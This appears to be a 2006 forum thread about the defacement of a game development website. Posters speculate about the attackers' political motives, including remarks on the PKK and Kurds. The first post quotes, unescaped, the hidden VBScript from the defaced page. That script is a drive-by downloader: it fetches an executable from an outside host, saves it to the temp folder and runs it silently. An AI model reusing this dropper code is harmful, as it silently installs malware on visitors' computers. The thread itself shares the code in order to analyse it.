Fenix.divsite.net Hacked !


Still Fresh
Jan 16, 2006
When I visited today, I noticed that the fenix.divsite.net has been defaced by - someone -.
Who is the administrator ? Can we contact him ?
I wonder what that vbscript and javascript do that is hidden down in those iframes.

Here is the vbscript unescaped...

<script>var Words="<html>
 <script language="VBScript">
	on error resume next
	dl = "http://www.q520.cn/qq/cha.exe"
	Set df = document.createElement("object")
	df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
	Set x = df.CreateObject(str,"")
	set S = df.createobject(str5,"")
	S.type = 1
	x.Open str6, dl, False
	set F = df.createobject("Scripting.FileSystemObject","")
	set tmp = F.GetSpecialFolder(2) 
	fname1= F.BuildPath(tmp,fname1)
	S.write x.responseBody
	S.savetofile fname1,2
	set Q = df.createobject("Shell.Application","")
	Q.ShellExecute fname1,"","","open",0
	<title>Oh,my god!   Goldsun[at]84823714</title>
	<center>You DO it!</center>
That message seems familiar. I don`t know where, but I have recently seen a similar moronic hack somewhere. It also said "No War" and mentioned "Turkish"... Shit, I can`t remember where I saw this. But why in hell would somebody hack a game development page and put a NO WAR sign on it? That is pretty retarded.

EDIT: Further reading leads me to the suspicion that this is some sort of political hack, trying to dishonour the PKK. For those who don`t know, PKK is an organisation which is prohibited in Turkey and also Germany as it is a militant workers party which is affiliated with a number of terrorist attacks in turkey and Europe. They are fighting for the rights of the kurds (Kurdistan?)... The kurds are a prosecuted minority in turkey. They have been prosecuted by the turkish government for decades and often kurdish people have been tortured and killed by turkish police forces and afterwards disguised and dressed up as terrorists to hide the crimes. It is up to everyone to believe the stories about the PKK. Most of it is true, but the kurds are certainly no criminals or terrorist. The criminals are turkish officials... well whatever. This seems to be some sort of dumb propaganda. Really sad.
we do have some turkish community members, maybe they have an idea what that crap is about? I would imagine that those script kids mostly crack turkish pages? I dunno... just a thought.

BTW: With the above post I do not want to support the PKK... just to be sure nobody gets me wrong. I really think the PKK is shit, I just have turkish and kurdish friends, and I know that they come along quite well, but the kurds have and are still being treated like dirt in certain parts of turkey.